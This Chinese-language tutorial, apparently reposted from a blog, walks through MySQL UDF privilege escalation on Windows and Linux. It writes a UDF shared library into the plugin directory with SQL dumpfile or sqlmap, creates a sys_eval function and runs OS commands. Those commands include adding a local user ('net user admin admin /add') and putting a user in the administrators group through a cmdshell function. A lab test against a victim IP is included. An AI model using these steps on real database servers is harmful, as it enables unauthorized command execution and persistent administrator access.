Mysql UDF提权方法
作者:互联网
Mysql UDF提权方法
0x01 UDF#
UDF(user defined function)用户自定义函数,是mysql的一个拓展接口。用户可以通过自定义函数实现在mysql中无法方便实现的功能,其添加的新函数都可以在sql语句中调用,就像调用本机函数一样。
0x02 windows下udf提权的条件#
- 如果mysql版本大于5.1,udf.dll文件必须放置在mysql安装目录的lib\plugin文件夹下/
- 如果mysql版本小于5.1, udf.dll文件在windows server 2003下放置于c:\windows\system32目录,在windows server 2000下放置在c:\winnt\system32目录。
- 掌握mysql数据库的账户,从拥有对mysql的insert和delete权限,以创建和抛弃函数。
- 拥有可以将udf.dll写入相应目录的权限。
0x03 提权方法#
如果是mysql5.1及以上版本,必须要把udf.dll文件放到mysql安装目录的lib\plugin文件夹下才能创建自定义函数。该目录默认是不存在的,需要使用webshell找到mysql的安装目录,并在安装目录下创建lib\plugin文件夹,然后将udf.dll文件导出到该目录。
在sqlmap中可以导入udf
复制到新建目录
create function sys_eval returns string soname "lib_mysqludf_sys.dll"; --引用共享库文件创建存储过程
成功执行命令,可以看到当前权限为administrator
删除该函数
参考
https://www.cnblogs.com/sijidou/p/10522972.html
https://www.jianshu.com/p/5b34c1b6dee7
https://blog.csdn.net/qq_26090065/article/details/81515355
注意:
把dll文件放入到特定的“文件夹”下方式有很多种:
方式a.如何你有webshell或有能操作文件的任何方式(比如远程登录),直接把dll文件放入特定文件夹下。文件名可以自定义,比如我喜欢命名为“udf.dll”。比如用“菜刀”操作文件
udf.dll文件下载链接:
方式b.也可以使用sql语句导入(写)一个dll文件。(只有sql语句执行权限最适合用此方法),下面的文章就是使用了此方法!
mysql udf提权实战测试
根据前天对大牛们的资料学习,进行一次mysql udf提权测试。
测试环境:
受害者系统:centos 7.7 ,docker部署mysql5.6.46, IP:192.168.226.128
攻击者系统:centos7.7,安装mysq client 5.7,IP:192.168.226.129
攻击者连接至mysql后,使用SQL语句检查相关的路径及权限
show variables like "%plugin%";
show variables like "%secure_file%";
攻击者系统
刚安装好的mysql时,secure_file_priv是有一个指定路径,而且并不在/usr/lib/mysql/下,则无法写入udf文件。手动在受害者所在系统/etc/mysql/mysql.conf.d/mysqld.conf中修改,若不存在secure_file_priv,则添加secure_file_priv=
受攻击系统的mysqld.conf
提权测试:
将udf十六进制导入查检目录中,先设置udf变量
mysql> set @a=unhex('udf十六进制编码,详见下文');
mysql> select @a into dumpfile '/usr/lib/mysql/plugin/udf.so';
上传插件
*************也可以使用sqlmap进行上传so文件:
python sqlmap.py -d "mysql://root:test1234@@192.168.226.128:3306/mysql" --file-write="C:\Users\username\AppData\Local\Programs\Python\Python37\sqlmap-master\data\udf\mysql\linux\64\lib_mysqludf_sys.so_" --file-dest="/usr/lib/mysql/plugin/udf.so"
引用方法,成功执行系统命令:
mysql> select * from func;
mysql> create function sys_eval returns string soname 'udf.so';
mysql> select sys_eval('whoami');
命令执行成功-whami
<进一步的权限提升及持久化,需要继续学习研究>
==》要使用net user add 才可以最终提权!!!如下:
3.使用自定义的函数。
我们可以使用如下命令来执行系统命令
select sys_eval('系统命令');
例如我们执行如下命令:
select sys_eval('net user admin admin /add');
就会发现新建了一个用户-admin
有些人对于UDF提权有一些错误的认知。认为UDF提权只是影响windows和mysql。但UDF(用户自定义函数)不仅仅是影响着Windows系统,也影响Linux系统。不仅仅影响Mysql,也影响Postgrepsql。
=============================
9.通过cmd function进行提权。
命令:
select cmdshell('net user x x /add');
select cmdshell('net localgroup administrators x /add');
10.远程到主机
11.查看管理员组
标签:lib,Mysql,dll,提权,udf,mysql,UDF,select 来源: https://www.cnblogs.com/bonelee/p/15864090.html